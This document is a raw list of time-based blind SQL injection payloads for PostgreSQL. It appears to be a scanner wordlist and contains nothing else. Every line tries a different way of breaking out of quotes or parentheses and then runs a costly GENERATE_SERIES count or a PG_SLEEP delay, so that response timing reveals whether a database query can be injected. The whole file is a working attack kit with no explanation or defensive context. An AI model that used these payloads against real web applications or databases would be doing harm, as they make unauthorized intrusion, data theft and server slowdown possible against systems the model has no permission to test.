%") AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%")) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%"))) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%" AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%00') AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%00')) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%00'))) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%00' AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
') WHERE 6784=6784 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
") WHERE 3268=3268 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
) WHERE 6934=6934 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
' WHERE 8068=8068 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
" WHERE 7606=7606 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
 WHERE 7420=7420 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
')) AS zKTS WHERE 3605=3605 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
")) AS sAup WHERE 2786=2786 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
)) AS SxvC WHERE 4387=4387 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
') AS VCCE WHERE 4350=4350 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
") AS XPqA WHERE 6803=6803 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
) AS XtrS WHERE 9934=9934 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'||(SELECT 'tbzX' FROM DUAL WHERE 9511=9511 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'||(SELECT 'rOfi' WHERE 8457=8457 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'+(SELECT IFdY WHERE 8559=8559 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'+(SELECT 'wUWK' WHERE 4119=4119 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
' IN BOOLEAN MODE) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
') OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
' OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
" OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
)) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
))) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
')) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'))) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
") OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
")) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
"))) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%') OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%')) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%'))) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%' OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%") OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%")) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%"))) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%" OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%00') OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%00')) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%00'))) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%00' OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
') WHERE 5570=5570 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
") WHERE 2786=2786 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
) WHERE 5938=5938 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
' WHERE 5134=5134 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
" WHERE 3658=3658 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
 WHERE 3558=3558 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
')) AS WtNQ WHERE 2262=2262 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
")) AS tejl WHERE 5587=5587 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
)) AS KPSC WHERE 8827=8827 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
') AS picg WHERE 9094=9094 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
") AS HSyq WHERE 5923=5923 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
) AS LylY WHERE 3325=3325 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'||(SELECT 'SCTi' FROM DUAL WHERE 4451=4451 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'||(SELECT 'ZzMc' WHERE 6258=6258 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'+(SELECT WnaK WHERE 3590=3590 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'+(SELECT 'LIbC' WHERE 8977=8977 OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
' IN BOOLEAN MODE) OR 8014=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
(SELECT 4445 FROM PG_SLEEP(15))
(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
',(SELECT (CASE WHEN (9766=9766) THEN (SELECT 9766 FROM PG_SLEEP(15)) ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN (9766=9766) THEN (SELECT 9766 FROM PG_SLEEP(15)) ELSE 1/(SELECT 0) END))
',(SELECT (CASE WHEN (9685=9685) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN (9685=9685) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) ELSE 1/(SELECT 0) END))
